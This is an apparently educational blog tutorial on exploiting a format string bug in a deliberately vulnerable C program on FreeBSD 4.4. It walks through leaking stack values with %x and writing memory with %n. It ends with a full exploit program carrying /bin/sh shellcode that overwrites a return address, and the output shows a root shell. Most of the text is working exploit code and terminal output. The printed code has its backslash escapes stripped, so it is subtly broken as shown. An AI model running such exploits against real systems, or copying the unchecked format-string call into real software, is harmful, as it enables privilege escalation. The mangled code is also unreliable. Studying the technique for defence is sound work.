Format String Bug

I wrote the following article during my second year of computer science school. The “format string bug” technique has been around for many years, and enables to basically take control of a machine with such a flaw. Surprisingly, a lot of current exploits still use it (a lot of programs rely on C libraries), so it is still important to know about it. In order to understand the following, you should know about C language programming, the gdb debugger and the memory layout of a process. I created and tested the exploit on a FreeBSD 4.4 OS.

The Format String vulnerability (on FreeBSD 4.4)

A vulnerable program:
Take a look at the following simple program. It reads from the standard input and prints what you type on the standard output. The aim of the exploit is to obtain a root shell from this program.

bash-2.05$ cat vuln.c
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void foo(char* tmp, char* buf)
{
    sprintf(tmp, buf);
    printf("%s", tmp);
}

int main(int argc, char** argv)
{
  char tmp[512];
  char buf[512];

  while(1)
    {
      memset(buf, '', 512);
      read(0, buf, 512);
      if (!strcmp(buf, "exitn"))
        break;
      foo(tmp, buf);
    }
  return 0;
}

bash-2.05$ cc -o vuln vuln.c
bash-2.05$ ./vuln
yo!
yo!
epita
epita
%x
0
%x %x %x
0 bfbff450 bfbff450
exit
bash-2.05$

As you can see the program prints out some numbers when you input “%x”. What are these numbers? As you can see in the program the input is copied in a 512 bytes buffer buf and then is passed to the function foo(). Then buf is copied in another 512 bytes buffer tmp with the function sprintf() and which gets printed out via printf(). The vulnerability is that sprintf() interprets the string buf. If you look at the manual of the printf family, you will find the list of special strings that get interpreted. If buf is filled with “%x” for example, the function sprintf() will fetch and print parameters from the memory stack. Here the only parameters passed are the empty buffer tmp and the input string buf. For each “%x”, the program prints out a 4 bytes value from the memory stack.

The power of the format buffer

With this in mind you can find useful information of the stack like a couple saved ebp/return address. You can recognize them because the return address points in low addresses like 0×80?????.

bash-2.05$ ./vuln
%x %x %x %x %x
0 bfbff450 293 2805f000 bfbff850
%x %x %x %x %x %x
0 bfbff450 bfbff450 1 bfbff850 8048642

Here we get the couple “bfbff850/8048642″ of the function that calls sprintf, which is foo. Now we know that the base pointer ebp of the function that calls the function that calls sprintf is 0xbfbff850 (in our program that function is main). Consequently the return address of main is saved in 0xbfbff854, 4 bytes further. How can we change the value stored in 0xbfbff854 in order to execute what we want?

First we should search in the stack where the buffer in which the input is stored is located. It is a variable local to main, so it should be somewhere in the stack. We can use a serie of “A” characters to determine where the buffer is.

bash-2.05$ ./vuln
AAAA-%6$x %x %x %x %x %x %x %x %x
AAAA-8048642 bfbff650 bfbff450 200 0 0 0 41414141 2078252d
AAAA-%13$x
AAAA-41414141

The buffer begins 13*sizeof(int) = 13*4 = 52 bytes after the parameter buf of printf on the stack. It is also usefull to determine
the absolute addresses of the buffer. Let’s try to find them without gdb. We know that foo gets the addresses of the buffers so they should be on the stack just after foo’s return address.

bash-2.05$ ./vuln
%5$x %x %x %x
bfbff850 8048642 bfbff650 bfbff450

Logically, since the size of both buffers is 512 bytes, we find that tmp begins at 0xbfbff650 = main’s ebp - 0×200 and buf begins at 0xbfbff450 = main’s ebp - 0×400.

It’s time to introduce another possibility of the format string which allows to write on the stack thanks to “%n”. That’s a pretty powerful/dangerous capability! printf interprets “%n” by writing the number of characters printed so far in the 4 bytes of the address specified (an int*). We can try to write the number of printed characters at the address bfbff470 (for example) and print this value thanks to a simple program:

int main()
{
  printf("x70xf4xbfxbf%%13$n %%20$x %%x %%xn");
  return 0;
}
bash-2.05$ cc -o test test.c
bash-2.05$ (./test; cat) | ./vuln
p&#xF4;&#xBF;&#xBF; 0 4 0
exit

bash-2.05$

The program test prints a string that will be an input of vuln. In this string we first put the int* address where we want to write the number of characters printed. Then “%%13$n” tells sprintf to write the number of printed characters at our specified address (13 is the offset where the buffer begins, remember?). To view the result we use the string “%%20$x %%x %%x”: it prints the 3 values stored in the
stack from the address 0xbfbff46c.

(20 - 13) *sizeof(int) + address of "buf" = 7 *4 + 0xbfbff450 = 0xbfbff450 + 0x1c = 0xbfbff46c

We can see that the second value from the stack is 4. It is located at the address 0xbfbff46c + 4 = 0xbfbff470, which is the address “\x70\xf4\xbf\xbf” we asked sprintf to write number of printed characters to.

It’s easy to imagine that you can basically write what you want where you want by using “%n” and by controlling
the number of characters printed. It’s just a matter of precise calculation :)

The exploit

The idea of the exploit is to overwrite the return address of main with the address of a shellcode that executes a shell. First You need to find a shellcode corresponding to your OS.

We know that main’s return address is stored at 0xbfbff854. It’s easy to store the shellcode in the buffer but how can we write its address, which is a large number? Indeed we can’t write 0xbfbff4?? bytes in a 512 bytes buffer, unless the vulnerable program uses a function with a n limiting parameter (like snprintf), because it would make the server crash. The trick is to write the address one byte at a time. For a 4 bytes address we will write it in 4 steps. Since sprintf writes 4 bytes for each “%n”, We must write from the lowest address to the highest so that we don’t to overwrite the bytes already written. For that reason, for an address like 0xbfbff470, you need to write 0xf4 before you write 0xbf. To limit the overwriting we could use “%hn” which makes sprintf write short int arguments to the stack. Also, since the internal written bytes counter only increases, we have to make it go to 0×1bf in order to write the 0xbf we need.

The next step is to overwrite main’s return address with an arbitrary address, for example 0xbfbff470. Here is the overwrite program.

main()
{
  char b0[256];
  char b1[256];
  char b2[256];
  char buffer[512];

  memset(b0, 0, 256);
  memset(b1, 0, 256);
  memset(b2, 0, 256);

  memset(b0, 'A', 0x70 - 0x10);
  memset(b1, 'A', 0xf4 - 0x70);
  memset(b2, 'A', 0x01bf - 0xf4);

  printf("x54xf8xbfxbf" // the first address
         "x55xf8xbfxbf" // the second
         "x56xf8xbfxbf" // the third
         "x57xf8xbfxbf" // the fourth
         // here 0x10 bytes have been "printed" so far
         "%s" // 0x70 bytes have now been "printed"
         "%%13$n"   // writes 0x70 at the first address
         "%s"// 0xf4 bytes have now been "printed"
         "%%n" // writes 0xf4 at the second address
         "%s" // 0x1bf bytes have now been "printed"
         "%%n" // writes 0x1bf at the third address
         "%%nn" // writes 0x1bf at the fourth address
         ,b0, b1, b2);
}

bash-2.05$ cc -o overwrite overwrite.c
bash-2.05$ ./vuln
%270$x
8048509
exit
bash-2.05$ (./overwrite; cat) | ./vuln
T&#xF8;&#xBF;&#xBF;U&#xF8;&#xBF;&#xBF;V&#xF8;&#xBF;&#xBF;W&#xF8;&#xBF;&#xBF;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
AAAAAAAAAAAAAAAAA
%270$x
bfbff470
exit

Segmentation fault (core dumped)
bash-2.05$

I won’t explain the program because it has lots of comments. The instruction “%270$x” prints out the value of main’s return address. We want to print the value stored at 0xbfbff854 and the beginning of the buffer, whose offset is 13, is at 0xbfbff450. Thus the offset of main’s return address is

13 + (0xbfbff850 - 0xbfbff454) / sizeof(int) = 13 + 1028 / 4 = 270

The normal value of the return address is 8048509 but after our crafted input the value becomes bfbff470. Hey, that’s what we want! The “Segmentation fault” is normal because the process continues executing at the address 0xbfbff470
after main() returns, and there is nothing good there.

Now we can create the final exploit. We only need to place a shellcode in the buffer. The most convenient solution is to place it just after the four addresses so that its address doesn’t depends on the length of the padding buffers b0, b1 and b2. But your shellcode should be as short as
possible so that

length of the shellcode + 0x10  <= less significant byte of the address to write

For example if you want to write the address 0xbfbff430 and your shellcode is 0×21 bytes long, since 0×21 + 0×10 > 0×30, you will have to increase the number of printed bytes to 0×130 instead of 0×30. As the input buffer is only 0×200 bytes long it is important to limit the padding.

Another solution is to place the shellcode at the end of the buffer and fill the padding buffers with nops. This way the execution will jump to your shellcode and you don’t have to calculate its exact address. The “%n” strings can be skipped by using assembly instruction like “\xeb”. This method won’t be discussed here.

One last problem is that once we have changed main’s return address we must type exit to break the main loop and this last input will overwrite our buffer… Fortunately there is the buffer tmp where the interpreted string is printed, so the shellcode should be still there. The address of tmp is 0xbfbff650 as we found before, consequently the address of the shellcode will be 0xbfbff660 because of the 4 addresses stored in front of it.

0xbfbff650 + 4 * 4 = 0xbfbff650 + 0x10 = 0xbfbff660

Following is the complete exploit.

bash-2.05$ cat exploit.c
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>

char shellcode[]=
"x31xc0x50x68x2fx2fx73x68x68x2f"
"x62x69x6ex89xe3x50x54x53"
"xb0x3bx50xcdx80";

main()
{
  char b0[255];
  char b1[255];
  char b2[255];
  char buffer[512];

  memset(b0, 0, 255);
  memset(b1, 0, 255);
  memset(b2, 0, 255);

  memset(b0, 'A', 0x60 - 0x10 - 0x17); // 0x10 because of the four addresses,
                                       // 0x17 because of the shellcode.
  memset(b1, 'A', 0xf6 - 0x60);
  memset(b2, 'A', 0x01bf - 0xf6);

  printf("x54xf8xbfxbf" // the first address
         "x55xf8xbfxbf" // the second
         "x56xf8xbfxbf" // the third
         "x57xf8xbfxbf" // the fourth
         // here 0x10 bytes have been "printed" so far
         "%s" // 0x27 bytes have now been "printed"
         "%s" // 0x60 bytes have now been "printed"
         "%%13$n" // writes 0x60 at the first address
         "%s" // 0xf6 bytes have now been "printed"
         "%%n" // writes 0xf6 at the second address
         "%s" // 0x1bf bytes have now been "printed"
         "%%n" // writes 0x1bf at the third address
         "%%nn" // writes 0x1bf at the fourth address
         ,shellcode, b0, b1, b2);
}

bash-2.05$ cc -o exploit exploit.c
bash-2.05$ (./exploit; cat) | ./vuln
T&#xF8;&#xBF;&#xBF;U&#xF8;&#xBF;&#xBF;V&#xF8;&#xBF;&#xBF;W&#xF8;&#xBF;&#xBF;1&#xC0;Ph//shh/bin&#xE3;PTS&#xB0;;P&#xCD;AAAAAAAAAAAAAAAAAAAAAAA...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
exit
ls
essai           exploit         exploit.c~      format.log      format.tex~
essai.c         exploit.c       file            format.pdf      format2.tex
essai.c~        exploit.core    format.aux      format.tex      overwrite
whoami
root
^C
bash-2.05$

It works!

Comments are closed.

Trackback this Post |